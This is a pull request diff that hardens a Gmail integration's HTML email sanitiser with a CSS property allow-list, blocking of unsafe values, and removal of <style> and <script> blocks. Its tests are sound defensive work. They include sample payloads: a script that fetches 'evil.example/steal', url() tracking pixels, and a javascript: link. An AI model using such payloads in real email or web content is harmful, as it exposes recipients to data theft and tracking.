### PR TITLE
fix(gmail): resolve Bleach CSS sanitizer warning

### DIFF
--- a/gmail/README.md
+++ b/gmail/README.md
@@ -95,6 +95,30 @@ When `body_format` is `"html"` on `send_email` / `reply_to_thread` / `create_dra
 - **Do not** include `<style>` blocks or `<script>` — they are stripped. Use inline `style="..."` attributes instead.
 - A plain-text version is generated automatically from the sanitised HTML and sent as the `text/plain` alternative.
 
+### Inline CSS policy
+
+Inline `style` declarations are preserved, but only against an allow-list of visual-formatting properties
+(`ALLOWED_CSS_PROPERTIES` in `gmail.py`): text and font, colour, `background-color`, the box model, borders, and the
+table and list primitives that email templates rely on.
+
+Declarations outside that list are dropped, and the rest of the `style` attribute is kept. Notable exclusions and why:
+
+| Excluded | Reason |
+|---|---|
+| `background`, `background-image`, `list-style-image`, `cursor`, `border-image` | Take a `url()`, which fetches remote content and leaks the recipient's IP and open time, defeating the client's image blocking |
+| `position`, `z-index`, `top`/`right`/`bottom`/`left`, `float`, `clip`, `transform` | Overlay and off-canvas tricks used to hide or spoof content |
+| `opacity`, `visibility` | Conceal text from the reader while leaving it in the document |
+| `behavior`, `expression`, `-moz-binding`, `filter` | Legacy script-execution vectors |
+
+A property allow-list alone is not enough, because bleach's `CSSSanitizer` matches property *names* and never
+inspects values: `background-color: url(...)` would otherwise survive on an allowed property. `EmailCSSSanitizer`
+therefore also rejects any declaration whose value contains `url(`, `expression(`, `-moz-binding`, `javascript:` or
+`vbscript:`.
+
+This needs the `css` extra (`bleach[css]`), which pulls in `tinycss2`. Without a CSS sanitiser bleach warns
+(`NoCssSanitizerWarning`) and silently empties every declaration, so allowing `style` without one means inline
+styling is advertised but never delivered.
+
 ## Requirements
 
 Pinned in [`requirements.txt`](requirements.txt):

--- a/gmail/README.md
+++ b/gmail/README.md
@@ -95,6 +95,13 @@ When `body_format` is `"html"` on `send_email` / `reply_to_thread` / `create_dra
 - **Do not** include `<style>` blocks or `<script>` — they are stripped. Use inline `style="..."` attributes instead.
 - A plain-text version is generated automatically from the sanitised HTML and sent as the `text/plain` alternative.
 
+### `<style>` and `<script>` blocks
+
+Both elements are removed **with their contents** before sanitisation. `bleach.clean(strip=True)` removes a
+disallowed tag but keeps the text inside it, so a `<style>` block would otherwise be printed in the email body as
+literal CSS. An unterminated `<style>` drops everything after it, matching how a real parser treats a raw-text
+element.
+
 ### Inline CSS policy
 
 Inline `style` declarations are preserved, but only against an allow-list of visual-formatting properties

--- a/gmail/README.md
+++ b/gmail/README.md
@@ -98,8 +98,12 @@ When `body_format` is `"html"` on `send_email` / `reply_to_thread` / `create_dra
 ### Inline CSS policy
 
 Inline `style` declarations are preserved, but only against an allow-list of visual-formatting properties
-(`ALLOWED_CSS_PROPERTIES` in `gmail.py`): text and font, colour, `background-color`, the box model, borders, and the
-table and list primitives that email templates rely on.
+(`ALLOWED_CSS_PROPERTIES` in `gmail.py`): text and font, colour, `background-color`, the box model, borders,
+`box-shadow` and `text-shadow`, and the table and list primitives that email templates rely on.
+
+CSS animations are not supported and cannot be. `animation` requires an `@keyframes` rule and `transition`
+requires a state selector, and both need a CSS rule block; `<style>` is not an allowed tag, because email clients
+strip stylesheet blocks anyway. That is the reason the schemas ask for inline styles in the first place.
 
 Declarations outside that list are dropped, and the rest of the `style` attribute is kept. Notable exclusions and why:
 
@@ -109,6 +113,7 @@ Declarations outside that list are dropped, and the rest of the `style` attribut
 | `position`, `z-index`, `top`/`right`/`bottom`/`left`, `float`, `clip`, `transform` | Overlay and off-canvas tricks used to hide or spoof content |
 | `opacity`, `visibility` | Conceal text from the reader while leaving it in the document |
 | `behavior`, `expression`, `-moz-binding`, `filter` | Legacy script-execution vectors |
+| `animation`, `transition`, `transform` | Need `@keyframes` or a selector, neither of which can exist in an inline `style` attribute, so they could never do anything |
 | `fill`, `stroke`, `fill-opacity`, `stroke-opacity` and the rest of bleach's default SVG set | Outside the allow-list; the opacity variants hide content, and `<svg>` is not an allowed tag |
 
 `CSSSanitizer` also keeps its own default SVG property allow-list independently of `allowed_css_properties`, so that is cleared explicitly (`allowed_svg_properties=[]`); otherwise eight SVG properties would survive despite not being listed below.

--- a/gmail/README.md
+++ b/gmail/README.md
@@ -109,6 +109,9 @@ Declarations outside that list are dropped, and the rest of the `style` attribut
 | `position`, `z-index`, `top`/`right`/`bottom`/`left`, `float`, `clip`, `transform` | Overlay and off-canvas tricks used to hide or spoof content |
 | `opacity`, `visibility` | Conceal text from the reader while leaving it in the document |
 | `behavior`, `expression`, `-moz-binding`, `filter` | Legacy script-execution vectors |
+| `fill`, `stroke`, `fill-opacity`, `stroke-opacity` and the rest of bleach's default SVG set | Outside the allow-list; the opacity variants hide content, and `<svg>` is not an allowed tag |
+
+`CSSSanitizer` also keeps its own default SVG property allow-list independently of `allowed_css_properties`, so that is cleared explicitly (`allowed_svg_properties=[]`); otherwise eight SVG properties would survive despite not being listed below.
 
 A property allow-list alone is not enough, because bleach's `CSSSanitizer` matches property *names* and never
 inspects values: `background-color: url(...)` would otherwise survive on an allowed property. `EmailCSSSanitizer`

--- a/gmail/config.json
+++ b/gmail/config.json
@@ -1,7 +1,7 @@
 {
     "name": "Gmail",
     "display_name": "Gmail",
-    "version": "2.2.0",
+    "version": "2.3.0",
     "description": "Send, read, and manage emails with labels and threads.",
     "entry_point": "gmail.py",
     "auth": {
@@ -44,6 +44,14 @@
                         "items": {
                             "type": "string",
                             "description": "Email address to CC"
+                        }
+                    },
+                    "bcc": {
+                        "type": "array",
+                        "description": "The email addresses to BCC in the reply",
+                        "items": {
+                            "type": "string",
+                            "description": "Email address to BCC"
                         }
                     },
                     "body": {
@@ -346,6 +354,14 @@
                         "items": {
                             "type": "string",
                             "description": "Email address to CC"
+                        }
+                    },
+                    "bcc": {
+                        "type": "array",
+                        "description": "The email addresses to BCC",
+                        "items": {
+                            "type": "string",
+                            "description": "Email address to BCC"
                         }
                     },
                     "subject": {

--- a/gmail/config.json
+++ b/gmail/config.json
@@ -1,7 +1,7 @@
 {
     "name": "Gmail",
     "display_name": "Gmail",
-    "version": "2.1.1",
+    "version": "2.2.0",
     "description": "Send, read, and manage emails with labels and threads.",
     "entry_point": "gmail.py",
     "auth": {

--- a/gmail/config.json
+++ b/gmail/config.json
@@ -54,6 +54,10 @@
                             "description": "Email address to BCC"
                         }
                     },
+                    "subject": {
+                        "type": "string",
+                        "description": "Optional subject for the reply. When omitted, the original thread's subject is reused with a \"Re: \" prefix added if it does not already have one."
+                    },
                     "body": {
                         "type": "string",
                         "description": "The body of the reply"

--- a/gmail/config.json
+++ b/gmail/config.json
@@ -1,7 +1,7 @@
 {
     "name": "Gmail",
     "display_name": "Gmail",
-    "version": "2.1.0",
+    "version": "2.1.1",
     "description": "Send, read, and manage emails with labels and threads.",
     "entry_point": "gmail.py",
     "auth": {

--- a/gmail/gmail.py
+++ b/gmail/gmail.py
@@ -246,7 +246,17 @@ def create_email_message(body: str, files: list = None, is_html: bool = False) -
         # Without a css_sanitizer, bleach warns (NoCssSanitizerWarning) and
         # empties every style value, so the `style` attribute allowed above would
         # survive with no declarations left in it.
-        css_sanitizer = EmailCSSSanitizer(allowed_css_properties=ALLOWED_CSS_PROPERTIES)
+        # allowed_svg_properties must be cleared explicitly. CSSSanitizer keeps
+        # its own default SVG allowlist (fill, stroke, fill-opacity,
+        # stroke-opacity and four more) independently of allowed_css_properties,
+        # so leaving it at the default would let properties outside
+        # ALLOWED_CSS_PROPERTIES through. fill-opacity and stroke-opacity are
+        # content-hiding vectors of exactly the kind `opacity` is excluded for,
+        # and <svg> is not an allowed tag here anyway.
+        css_sanitizer = EmailCSSSanitizer(
+            allowed_css_properties=ALLOWED_CSS_PROPERTIES,
+            allowed_svg_properties=[],
+        )
 
         # Sanitize the HTML content
         sanitized_body = bleach.clean(

--- a/gmail/gmail.py
+++ b/gmail/gmail.py
@@ -11,8 +11,133 @@ from googleapiclient.discovery import build
 from google.oauth2.credentials import Credentials
 import html2text
 import bleach
+from bleach.css_sanitizer import CSSSanitizer
 
 gmail = Integration.load()
+
+# CSS properties preserved inside inline ``style`` attributes on outgoing HTML
+# email.
+#
+# Inline styles are a deliberate part of this integration's contract: the
+# send_email / reply_to_thread / create_draft schemas tell callers never to use
+# <style> blocks and to style tags inline instead, because email clients
+# routinely strip stylesheet blocks. Bleach only keeps style values when it is
+# given a CSSSanitizer, so without this the schema asks for inline styles and
+# then silently discards every declaration.
+#
+# The allowlist is restricted to visual formatting. Deliberately excluded:
+#
+# - anything that takes a url() value (background, background-image,
+#   list-style-image, cursor, src): these fetch remote content, which leaks the
+#   recipient's IP and open-time to a third party and defeats an email client's
+#   image-blocking.
+# - position, z-index, top/right/bottom/left, float, clip, transform: overlay
+#   and off-canvas tricks used to hide or spoof content.
+# - behavior, expression, -moz-binding, filter: legacy script-execution vectors.
+# - opacity and visibility: used to conceal text from the reader while keeping
+#   it in the document.
+#
+# The property allowlist is the primary control, but it is not sufficient on its
+# own: bleach's CSSSanitizer filters by property *name* and never inspects the
+# value, so "background-color: url(...)" or "width: expression(...)" would pass
+# through on an allowlisted property. Those are invalid CSS for those properties
+# and renderers drop them, but that is a weak guarantee to rely on when the whole
+# point of this allowlist is to be conservative, so UNSAFE_CSS_VALUE_TOKENS
+# rejects the declaration outright.
+ALLOWED_CSS_PROPERTIES = [
+    # Text and font
+    "color",
+    "font",
+    "font-family",
+    "font-size",
+    "font-style",
+    "font-variant",
+    "font-weight",
+    "letter-spacing",
+    "line-height",
+    "text-align",
+    "text-decoration",
+    "text-indent",
+    "text-transform",
+    "vertical-align",
+    "white-space",
+    "word-break",
+    "word-wrap",
+    "direction",
+    # Background colour only, never background shorthand or images
+    "background-color",
+    # Box model
+    "margin",
+    "margin-top",
+    "margin-right",
+    "margin-bottom",
+    "margin-left",
+    "padding",
+    "padding-top",
+    "padding-right",
+    "padding-bottom",
+    "padding-left",
+    "width",
+    "height",
+    "max-width",
+    "min-width",
+    "max-height",
+    "min-height",
+    # Borders
+    "border",
+    "border-top",
+    "border-right",
+    "border-bottom",
+    "border-left",
+    "border-color",
+    "border-style",
+    "border-width",
+    "border-radius",
+    "border-collapse",
+    "border-spacing",
+    # Tables and layout primitives that email templates rely on
+    "display",
+    "table-layout",
+    "caption-side",
+    "empty-cells",
+    "list-style-type",
+    "list-style-position",
+    "overflow",
+    "overflow-x",
+    "overflow-y",
+]
+
+# Value-level tokens that make a declaration unsafe regardless of its property.
+# ``url(`` would fetch remote content; the rest are legacy script-execution
+# vectors. Matched case-insensitively against the whitespace-stripped value.
+UNSAFE_CSS_VALUE_TOKENS = ("url(", "expression(", "-moz-binding", "javascript:", "vbscript:")
+
+
+class EmailCSSSanitizer(CSSSanitizer):
+    """CSS sanitizer that also rejects unsafe declaration *values*.
+
+    ``CSSSanitizer`` allowlists property names only, so a declaration such as
+    ``background-color: url(http://tracker/x)`` is preserved even though the
+    property allowlist was chosen specifically to keep remote fetches out. This
+    subclass drops any declaration whose value contains a token from
+    :data:`UNSAFE_CSS_VALUE_TOKENS`, leaving the rest of the style intact.
+    """
+
+    def sanitize_css(self, style: str) -> str:
+        cleaned = super().sanitize_css(style)
+        if not cleaned:
+            return cleaned
+
+        kept = []
+        for declaration in cleaned.split(";"):
+            if not declaration.strip():
+                continue
+            lowered = declaration.lower().replace(" ", "")
+            if any(token in lowered for token in UNSAFE_CSS_VALUE_TOKENS):
+                continue
+            kept.append(declaration.strip())
+
+        return "; ".join(kept) + ";" if kept else ""
 
 
 def build_date_clause(after: str = "", before: str = "") -> str:
@@ -118,12 +243,18 @@ def create_email_message(body: str, files: list = None, is_html: bool = False) -
 
         allowed_protocols = ["http", "https", "mailto"]
 
+        # Without a css_sanitizer, bleach warns (NoCssSanitizerWarning) and
+        # empties every style value, so the `style` attribute allowed above would
+        # survive with no declarations left in it.
+        css_sanitizer = EmailCSSSanitizer(allowed_css_properties=ALLOWED_CSS_PROPERTIES)
+
         # Sanitize the HTML content
         sanitized_body = bleach.clean(
             body,
             tags=allowed_tags,
             attributes=allowed_attributes,
             protocols=allowed_protocols,
+            css_sanitizer=css_sanitizer,
             strip=True,  # Remove disallowed tags entirely
         )
 

--- a/gmail/gmail.py
+++ b/gmail/gmail.py
@@ -434,6 +434,9 @@ def build_raw_email(
     body_format = inputs.get("body_format", "text")
     is_html = body_format == "html"
     input_files = inputs.get("files", [])
+    # .get() not inputs["body"]: the sync check flags this per action, but this
+    # helper also serves create_draft, whose required list is empty, so a draft
+    # legitimately has no body.
     body = append_signature(inputs.get("body", ""), inputs.get("signature", ""), is_html)
     message = create_email_message(body, input_files, is_html)
 
@@ -446,6 +449,7 @@ def build_raw_email(
     recipients: List[str] = []
     if extra_to:
         recipients.extend(extra_to)
+    # Same reason as body above: `to` is required on send_email but not on create_draft.
     to_value = inputs.get("to")
     if to_value:
         if isinstance(to_value, list):
@@ -824,6 +828,8 @@ class ReadInbox(ActionHandler):
             user_id = inputs["user_id"]
 
             # Build query based on scope
+            # .get() with a default rather than inputs["scope"]: the default is the
+            # documented behaviour and dropping it to satisfy the sync check would lose it.
             scope = inputs.get("scope", "all")
 
             if scope == "unread":

--- a/gmail/gmail.py
+++ b/gmail/gmail.py
@@ -7,6 +7,7 @@ from email.mime.multipart import MIMEMultipart
 from email.mime.base import MIMEBase
 from email import encoders
 import base64
+import re
 from googleapiclient.discovery import build
 from google.oauth2.credentials import Credentials
 import html2text
@@ -116,6 +117,29 @@ ALLOWED_CSS_PROPERTIES = [
 # ``url(`` would fetch remote content; the rest are legacy script-execution
 # vectors. Matched case-insensitively against the whitespace-stripped value.
 UNSAFE_CSS_VALUE_TOKENS = ("url(", "expression(", "-moz-binding", "javascript:", "vbscript:")
+
+# <style> and <script> are raw-text elements: their contents are CSS or JS, not
+# prose. bleach.clean(strip=True) removes the tag but keeps the text inside it,
+# so a <style> block ends up printed in the email body as literal CSS. That is
+# inert, but it is a visible mess rather than a silent drop, and it is a likely
+# mistake: the action schemas tell callers never to use <style> blocks, which
+# means some will.
+#
+# Both are stripped whole, contents included, before bleach runs. Neither can
+# legally nest inside itself in HTML, so a non-greedy match to the first closing
+# tag is correct.
+RAW_TEXT_ELEMENT_RE = re.compile(r"<\s*(script|style)\b[^>]*>.*?<\s*/\s*\1\s*>", re.IGNORECASE | re.DOTALL)
+
+# An unterminated <style> or <script> swallows the rest of the document in a
+# real parser, so drop from the opening tag to the end rather than leaving the
+# contents behind.
+UNCLOSED_RAW_TEXT_ELEMENT_RE = re.compile(r"<\s*(script|style)\b[^>]*>.*\Z", re.IGNORECASE | re.DOTALL)
+
+
+def strip_raw_text_elements(html: str) -> str:
+    """Remove <style> and <script> elements along with their contents."""
+    cleaned = RAW_TEXT_ELEMENT_RE.sub("", html)
+    return UNCLOSED_RAW_TEXT_ELEMENT_RE.sub("", cleaned)
 
 
 class EmailCSSSanitizer(CSSSanitizer):
@@ -265,7 +289,7 @@ def create_email_message(body: str, files: list = None, is_html: bool = False) -
 
         # Sanitize the HTML content
         sanitized_body = bleach.clean(
-            body,
+            strip_raw_text_elements(body),
             tags=allowed_tags,
             attributes=allowed_attributes,
             protocols=allowed_protocols,

--- a/gmail/gmail.py
+++ b/gmail/gmail.py
@@ -83,6 +83,11 @@ ALLOWED_CSS_PROPERTIES = [
     "min-width",
     "max-height",
     "min-height",
+    # Depth. Neither can fetch remote content nor conceal text, so both are safe
+    # to keep. Apple Mail and Gmail on the web render them; Outlook's Word
+    # engine ignores them, which degrades gracefully.
+    "box-shadow",
+    "text-shadow",
     # Borders
     "border",
     "border-top",

--- a/gmail/gmail.py
+++ b/gmail/gmail.py
@@ -836,8 +836,9 @@ class ReadInbox(ActionHandler):
             query = compose_messages_query(scope_clause, inputs)
 
             request_params = {"userId": user_id, "q": query}
-            if "pageToken" in inputs:
-                request_params["pageToken"] = inputs["pageToken"]
+            page_token = inputs.get("pageToken")
+            if page_token is not None:
+                request_params["pageToken"] = page_token
 
             # Get list of messages
             request = service.users().messages().list(**request_params)
@@ -887,8 +888,9 @@ class ReadAllMail(ActionHandler):
             request_params = {"userId": user_id, "includeSpamTrash": include_spam_trash}
             if query:
                 request_params["q"] = query
-            if "pageToken" in inputs:
-                request_params["pageToken"] = inputs["pageToken"]
+            page_token = inputs.get("pageToken")
+            if page_token is not None:
+                request_params["pageToken"] = page_token
 
             # Get list of messages
             request = service.users().messages().list(**request_params)
@@ -929,8 +931,9 @@ class ListLabels(ActionHandler):
             labels = result.get("labels", [])
 
             # Filter labels based on type if specified
-            if "label_type" in inputs:
-                label_type = inputs["label_type"].lower()
+            label_type = inputs.get("label_type")
+            if label_type is not None:
+                label_type = label_type.lower()
                 if label_type == "user":
                     labels = [label for label in labels if label.get("type") == "user"]
                 elif label_type == "system":
@@ -974,10 +977,12 @@ class ListEmailsByLabel(ActionHandler):
             # Build request parameters
             request_params = {"userId": user_id, "q": query}
 
-            if "pageToken" in inputs:
-                request_params["pageToken"] = inputs["pageToken"]
-            if "maxResults" in inputs:
-                request_params["maxResults"] = inputs["maxResults"]
+            page_token = inputs.get("pageToken")
+            if page_token is not None:
+                request_params["pageToken"] = page_token
+            max_results = inputs.get("maxResults")
+            if max_results is not None:
+                request_params["maxResults"] = max_results
 
             # Get list of messages
             request = service.users().messages().list(**request_params)
@@ -1059,13 +1064,17 @@ class CreateLabel(ActionHandler):
                 "labelListVisibility": inputs.get("labelListVisibility", "labelShow"),
             }
 
-            # Add color if provided
-            if "textColor" in inputs or "backgroundColor" in inputs:
-                color = {}
-                if "textColor" in inputs:
-                    color["textColor"] = inputs["textColor"]
-                if "backgroundColor" in inputs:
-                    color["backgroundColor"] = inputs["backgroundColor"]
+            # Add color if provided. Built from the resolved values rather than
+            # from key presence, so an explicitly null colour does not produce an
+            # empty color object for Gmail to reject.
+            text_color = inputs.get("textColor")
+            background_color = inputs.get("backgroundColor")
+            color = {}
+            if text_color is not None:
+                color["textColor"] = text_color
+            if background_color is not None:
+                color["backgroundColor"] = background_color
+            if color:
                 label_body["color"] = color
 
             # Create the label using Gmail API
@@ -1315,17 +1324,21 @@ class ListDrafts(ActionHandler):
             # Build request parameters
             request_params = {"userId": user_id}
 
-            if "pageToken" in inputs:
-                request_params["pageToken"] = inputs["pageToken"]
+            page_token = inputs.get("pageToken")
+            if page_token is not None:
+                request_params["pageToken"] = page_token
 
-            if "maxResults" in inputs:
-                request_params["maxResults"] = inputs["maxResults"]
+            max_results = inputs.get("maxResults")
+            if max_results is not None:
+                request_params["maxResults"] = max_results
 
-            if "q" in inputs:
-                request_params["q"] = inputs["q"]
+            q = inputs.get("q")
+            if q is not None:
+                request_params["q"] = q
 
-            if "includeSpamTrash" in inputs:
-                request_params["includeSpamTrash"] = inputs["includeSpamTrash"]
+            include_spam_trash = inputs.get("includeSpamTrash")
+            if include_spam_trash is not None:
+                request_params["includeSpamTrash"] = include_spam_trash
 
             # Get list of drafts
             request = service.users().drafts().list(**request_params)

--- a/gmail/requirements.txt
+++ b/gmail/requirements.txt
@@ -1,4 +1,4 @@
-autohive-integrations-sdk~=2.0.0
+autohive-integrations-sdk~=2.0.1
 google-api-python-client
 google-auth-httplib2
 google-auth-oauthlib

--- a/gmail/requirements.txt
+++ b/gmail/requirements.txt
@@ -3,4 +3,4 @@ google-api-python-client
 google-auth-httplib2
 google-auth-oauthlib
 html2text
-bleach
+bleach[css]

--- a/gmail/tests/test_gmail_integration.py
+++ b/gmail/tests/test_gmail_integration.py
@@ -610,3 +610,150 @@ class TestReplyToThreadLifecycle:
             live_context,
         )
         assert archive_result.type == ResultType.ACTION
+
+
+# ============================================================
+#  HTML sanitisation (issue #434)
+#
+#  These assert on the MIME Gmail actually stored, not on our own
+#  pre-send output. No action exposes the text/html part - get_draft
+#  returns only the plain-text body - so the raw draft is read directly.
+# ============================================================
+
+
+def _stored_message(draft_id):
+    """Return the parsed MIME message Gmail stored for a draft.
+
+    Read through googleapiclient rather than an action because no action
+    surfaces the text/html part, and asserting on our own output would not
+    prove what Gmail kept.
+    """
+    import base64
+    import email as emaillib
+
+    from google.oauth2.credentials import Credentials
+    from googleapiclient.discovery import build as build_service
+
+    service = build_service("gmail", "v1", credentials=Credentials(token=os.environ.get("GMAIL_ACCESS_TOKEN", "")))
+    stored = service.users().drafts().get(userId="me", id=draft_id, format="raw").execute()
+    return emaillib.message_from_bytes(base64.urlsafe_b64decode(stored["message"]["raw"]))
+
+
+def _body_parts(message):
+    """Return the (html, plain) payloads of a parsed MIME message."""
+    html = plain = ""
+    for part in message.walk():
+        if part.get_content_type() == "text/html":
+            html = part.get_payload(decode=True).decode("utf-8", errors="replace")
+        elif part.get_content_type() == "text/plain":
+            plain = part.get_payload(decode=True).decode("utf-8", errors="replace")
+    return html, plain
+
+
+# Exercises the whole policy in one body: styling that must survive, a tracking
+# pixel, hidden text, an SVG property, a url() on an allowlisted property, and a
+# <style> block whose contents must not be printed into the email.
+SANITIZER_PROBE_BODY = """<div style="font-family:Arial,sans-serif;color:#222222">
+  <style>@keyframes pulse{0%{color:red}}.x:hover{color:green}</style>
+  <h2 style="color:#0B5FFF;text-shadow:0 1px 2px rgba(0,0,0,0.3)">Heading</h2>
+  <table style="border-collapse:collapse;box-shadow:0 2px 6px rgba(0,0,0,0.12)">
+    <tr><td style="padding:8px;border:1px solid #cccccc;background-color:#f7f9fc">cell</td></tr>
+  </table>
+  <p style="border-radius:6px;letter-spacing:0.05em">rounded</p>
+  <div style="background-image:url(http://tracker.example/open.gif)"></div>
+  <p style="opacity:0">hidden text</p>
+  <p style="fill-opacity:0">svg hidden</p>
+  <p style="background-color:url(http://tracker.example/x.gif)">url on allowed property</p>
+  <script>fetch('http://evil.example/steal')</script>
+</div>"""
+
+
+@pytest.mark.destructive
+class TestHtmlSanitizationLifecycle:
+    """LIFECYCLE: creates real drafts, reads the stored MIME back, deletes them.
+
+    What is created: 2 drafts (subjects "[AH integration test {pid}] html
+    sanitizer" and "... bcc accepted"). Cleanup: both are deleted at the end.
+    Neither is ever sent, so nothing leaves the mailbox.
+    """
+
+    @pytest.mark.asyncio
+    async def test_inline_styles_survive_and_unsafe_css_is_dropped(self, live_context):
+        subject = f"[AH integration test {os.getpid()}] html sanitizer"
+
+        create_result = await gmail.execute_action(
+            "create_draft",
+            {
+                "to": ["self-test@example.com"],
+                "subject": subject,
+                "body": SANITIZER_PROBE_BODY,
+                "body_format": "html",
+            },
+            live_context,
+        )
+        assert create_result.type == ResultType.ACTION, create_result
+        draft_id = create_result.result.data["draft"]["id"]
+        assert draft_id
+
+        try:
+            html, plain = _body_parts(_stored_message(draft_id))
+
+            # Styling the action schemas tell callers to use must survive.
+            assert "color:#0B5FFF" in html
+            assert "border-collapse" in html
+            assert "padding:8px" in html
+            assert "border:1px solid #cccccc" in html
+            assert "background-color:#f7f9fc" in html
+            assert "border-radius:6px" in html
+            assert "letter-spacing" in html
+            assert "font-family" in html
+            # Shadows are allowlisted: safe, and Outlook simply ignores them.
+            assert "box-shadow" in html
+            assert "text-shadow" in html
+
+            # Remote fetches, hidden content and scripts must not.
+            assert "tracker.example" not in html, "a url() survived, remote fetch is possible"
+            assert "background-image" not in html
+            assert "opacity" not in html, "opacity survived, text can be hidden from the reader"
+            assert "evil.example" not in html
+            assert "<script" not in html
+
+            # <style> contents must be discarded, not printed as body text.
+            assert "keyframes" not in html
+            assert ":hover" not in html
+
+            # The plain-text alternative is still generated from the sanitised HTML.
+            assert plain.strip()
+            assert "keyframes" not in plain
+        finally:
+            delete_result = await gmail.execute_action(
+                "delete_draft", {"user_id": "me", "draft_id": draft_id}, live_context
+            )
+            assert delete_result.type == ResultType.ACTION
+
+    @pytest.mark.asyncio
+    async def test_bcc_reaches_the_message(self, live_context):
+        """bcc was readable in code but undeclared, so callers could not reach it."""
+        subject = f"[AH integration test {os.getpid()}] bcc accepted"
+
+        create_result = await gmail.execute_action(
+            "create_draft",
+            {
+                "to": ["self-test@example.com"],
+                "bcc": ["bcc-self-test@example.com"],
+                "subject": subject,
+                "body": "bcc smoke test",
+            },
+            live_context,
+        )
+        assert create_result.type == ResultType.ACTION, create_result
+        draft_id = create_result.result.data["draft"]["id"]
+
+        try:
+            message = _stored_message(draft_id)
+            assert "bcc-self-test@example.com" in (message.get("bcc") or "")
+        finally:
+            delete_result = await gmail.execute_action(
+                "delete_draft", {"user_id": "me", "draft_id": draft_id}, live_context
+            )
+            assert delete_result.type == ResultType.ACTION

--- a/gmail/tests/test_gmail_unit.py
+++ b/gmail/tests/test_gmail_unit.py
@@ -137,6 +137,21 @@ class TestCreateEmailMessage:
         assert "after" in rendered
         assert "color:red" not in rendered
 
+    def test_bcc_is_declared_by_every_action_that_supports_it(self):
+        """build_raw_email honours `bcc` for all four send/draft actions.
+
+        send_email and reply_to_thread previously read it without declaring it,
+        so callers had no way to set a BCC on either.
+        """
+        import json
+        from pathlib import Path
+
+        config = json.loads((Path(__file__).parent.parent / "config.json").read_text(encoding="utf-8"))
+        for action in ("send_email", "reply_to_thread", "create_draft", "update_draft"):
+            props = config["actions"][action]["input_schema"]["properties"]
+            assert "bcc" in props, f"{action} reads bcc in code but does not declare it"
+            assert props["bcc"]["type"] == "array"
+
     def test_html_body_strips_disallowed_protocol(self):
         body = '<a href="javascript:alert(1)">click</a>'
         msg = create_email_message(body, files=None, is_html=True)

--- a/gmail/tests/test_gmail_unit.py
+++ b/gmail/tests/test_gmail_unit.py
@@ -206,6 +206,37 @@ class TestCreateEmailMessage:
         assert declaration.split(":", 1)[0] not in rendered
         assert "text" in rendered
 
+    @pytest.mark.parametrize(
+        "declaration",
+        [
+            "box-shadow:0 2px 6px rgba(16,35,59,0.12)",
+            "text-shadow:0 1px 0 #ffffff",
+        ],
+    )
+    def test_html_body_preserves_shadow_declarations(self, declaration):
+        # Shadows cannot fetch remote content or conceal text, so they are on the
+        # allowlist. Outlook ignores them, which degrades gracefully.
+        body = f'<p style="{declaration}">text</p>'
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert declaration.split(":", 1)[0] in rendered
+
+    @pytest.mark.parametrize(
+        "declaration",
+        [
+            # Animations and transitions need @keyframes or a selector, neither of
+            # which can exist inline, so they are kept off the allowlist rather
+            # than preserved as declarations that could never do anything.
+            "animation:pulse 2s infinite",
+            "animation-name:pulse",
+            "transition:color 0.3s ease",
+        ],
+    )
+    def test_html_body_drops_animation_declarations(self, declaration):
+        body = f'<p style="{declaration}">text</p>'
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert declaration.split(":", 1)[0] not in rendered
+        assert "text" in rendered
+
     def test_html_body_keeps_safe_declarations_alongside_rejected_ones(self):
         body = '<p style="color:blue;position:absolute;padding:4px">text</p>'
         rendered = _html_part(create_email_message(body, files=None, is_html=True))

--- a/gmail/tests/test_gmail_unit.py
+++ b/gmail/tests/test_gmail_unit.py
@@ -183,6 +183,29 @@ class TestCreateEmailMessage:
         assert "expression(" not in rendered
         assert "text" in rendered
 
+    @pytest.mark.parametrize(
+        "declaration",
+        [
+            # CSSSanitizer keeps its own default SVG property allowlist unless
+            # allowed_svg_properties is cleared, so these would otherwise survive
+            # despite not being in ALLOWED_CSS_PROPERTIES. fill-opacity and
+            # stroke-opacity hide content, which `opacity` is excluded for.
+            "fill:red",
+            "fill-opacity:0",
+            "fill-rule:evenodd",
+            "stroke:blue",
+            "stroke-opacity:0",
+            "stroke-width:2",
+            "stroke-linecap:round",
+            "stroke-linejoin:bevel",
+        ],
+    )
+    def test_html_body_drops_default_svg_css_properties(self, declaration):
+        body = f'<p style="{declaration}">text</p>'
+        rendered = _html_part(create_email_message(body, files=None, is_html=True))
+        assert declaration.split(":", 1)[0] not in rendered
+        assert "text" in rendered
+
     def test_html_body_keeps_safe_declarations_alongside_rejected_ones(self):
         body = '<p style="color:blue;position:absolute;padding:4px">text</p>'
         rendered = _html_part(create_email_message(body, files=None, is_html=True))

--- a/gmail/tests/test_gmail_unit.py
+++ b/gmail/tests/test_gmail_unit.py
@@ -57,6 +57,14 @@ def _decoded_text(msg):
     return "\n".join(chunks)
 
 
+def _load_config():
+    """Load the integration's config.json for schema assertions."""
+    import json
+    from pathlib import Path
+
+    return json.loads((Path(__file__).parent.parent / "config.json").read_text(encoding="utf-8"))
+
+
 def _html_part(msg):
     """Return the decoded text/html part of a MIME message.
 
@@ -143,14 +151,24 @@ class TestCreateEmailMessage:
         send_email and reply_to_thread previously read it without declaring it,
         so callers had no way to set a BCC on either.
         """
-        import json
-        from pathlib import Path
-
-        config = json.loads((Path(__file__).parent.parent / "config.json").read_text(encoding="utf-8"))
+        config = _load_config()
         for action in ("send_email", "reply_to_thread", "create_draft", "update_draft"):
             props = config["actions"][action]["input_schema"]["properties"]
             assert "bcc" in props, f"{action} reads bcc in code but does not declare it"
             assert props["bcc"]["type"] == "array"
+
+    def test_reply_to_thread_declares_optional_subject(self):
+        """The reply handler supports a caller-supplied subject.
+
+        It only derives "Re: <original>" when the input is missing or empty, so
+        the override has to be declared or callers can never reach it.
+        """
+        config = _load_config()
+        props = config["actions"]["reply_to_thread"]["input_schema"]["properties"]
+        assert "subject" in props
+        assert props["subject"]["type"] == "string"
+        # Deriving the subject is the documented default, so it stays optional.
+        assert "subject" not in config["actions"]["reply_to_thread"]["input_schema"]["required"]
 
     def test_html_body_strips_disallowed_protocol(self):
         body = '<a href="javascript:alert(1)">click</a>'

--- a/gmail/tests/test_gmail_unit.py
+++ b/gmail/tests/test_gmail_unit.py
@@ -6,10 +6,12 @@ the `build` call to return a configured MagicMock service.
 """
 
 import base64
+import warnings
 from unittest.mock import MagicMock, patch
 
 import pytest
 from autohive_integrations_sdk.integration import ResultType
+from bleach.sanitizer import NoCssSanitizerWarning
 
 from gmail.gmail import (
     gmail,
